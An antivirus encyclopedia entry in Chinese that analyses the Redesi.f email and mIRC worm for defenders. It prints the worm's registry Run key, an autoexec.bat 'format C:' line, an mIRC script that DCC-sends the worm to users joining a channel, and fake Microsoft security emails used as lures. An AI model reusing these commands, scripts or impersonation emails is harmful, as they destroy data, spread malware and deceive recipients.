概述
病毒別名:I-Worm.Redesi.f 【AVP】,I-Worm/Redesi.f 【KV】,Worm.Redesi.f【RS】處理時間:
威脅級別:★★
中文名稱:紅絲帶變種F
病毒類型:蠕蟲
影響系統:Win9x / WinNT
病毒行為:
這是一個通過電子郵件和mIRC傳播的蠕蟲病毒。該病毒發作的時候會彈出一個Windows更新成功的訊息框來欺騙用戶,並將病毒的5個副本拷貝到C糟根目錄下,在註冊表中添加啟動項,實現病毒的開機自啟動。病毒還會向C:\autoexec.bat中寫入2條批處理命令,一條顯示“With a fool no season spend, or be counted as his freind.”,另一條則是格式化C糟。通過更改mIRC的腳本配置檔案,使得mIRC系統與病毒檔案建立聯繫,擴展病毒的傳播途徑。病毒還會生成一個html檔案C:\inetpub\wwwroot\default.htm,當用戶打開該頁面的時候,就會打開病毒檔案。該病毒在Outlook Express的地址薄裡面收集郵件地址,再以Microsoft的名義將病毒做為附屬檔案傳送出去,該郵件極具欺騙性,用戶很可能會受騙而去打開附屬檔案,從而感染該病毒。1)在C糟根目錄下建立病毒的多個副本(都是隱藏檔案):
C:\Commond.exe
C:\MAPI.exe
C:\Sysupdate.exe
C:\UserConfig.exe
C:\disksync.exe
2)在註冊表中為病毒的自啟動添加啟動項:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"Desire"="C:\commond.exe"
在KEY_LOCAL_MACHINE\Software\Microsoft下添加鍵值:
"Desire"="Done"
3)向C:\autoexec.bat寫入以下內容:
ECHO With a fool no season spend, or be counted as his freind.
format C: /autotest
4)向C:\mirc\script.ini寫入以下內容:
【script】
n0= on 1:JOIN:#:{
n1= .msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet / Undernet staff.
n2= .copy C:\MAPI.exe C:\mirc\IRCUpdate.IRC.pif
n3= .dcc send $nick C:\mirc\IRCUpdate.IRC.pif
n4= }
5)建立檔案:
C:\inetpub\wwwroot\web.exe
生成對應該檔案的網頁檔案:
C:\inetpub\wwwroot\default.htm
該檔案的內容如下:
META http-equiv="refresh" content="0; url=Web.exe"
A href="./Web.exe"
h3
We Are Forever
/h3
/A
6)取下面的某一行做為郵件的主題:
FW: Windows at Risk.
FW: Buffer overflow could cause IT meltdown.
FW: Insufficient bounds chcecking cause buffer over run.
FW: Executable stack could cost IT sector millions.
FW: Invalid instruction causes AX and BX registers to differ.
FW: Terrorists release computer virus.
FW: Microsoft and C.E.R.T Corobaration
FW: Stack overrun can cause data loss on first bootable disk
FW: Microsoft Update. Final Release Candidate.
FW: Redesi worm. MAPI update..
7)郵件:
Hey. Sorry I've not emailed you for a while ... well I am now.
Just letting you know I'll be sending an attachment in my next email,so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK.
Speak to you later.
Hey
Well, here is the email I told you I was going to send.
I'll speak to you more later. The boss is comming.
-----Original Message-----
From: Microsoft Security List 【mailto:[email protected]】
Sent: 25 October 2001 12:03
Subject: Buffer overflow
Dear Subscriber
Due to insufficient bounds checking in the Windows Messaging API
any value stores in the AX and BX registers(and their register halves
any XOR (compare) operation against these to registers or the h and l register halfs
will always return and value of 1, causing the JNE instruction to execute.
We consider this a HIGH RISK vulnerability,and any computer hacker having any
knowledge of the assembly language could write a working egg to exploit this flaw.
It is highly advised that you install the attached MAPI update to stop any subsequent security breach.
Regards
Microsoft Support
8)取下面的某一個名字做為附屬檔案名:
Commond.exe
MAPI.exe
Sysupdate.exe
UserConfig.exe
disksync.exe
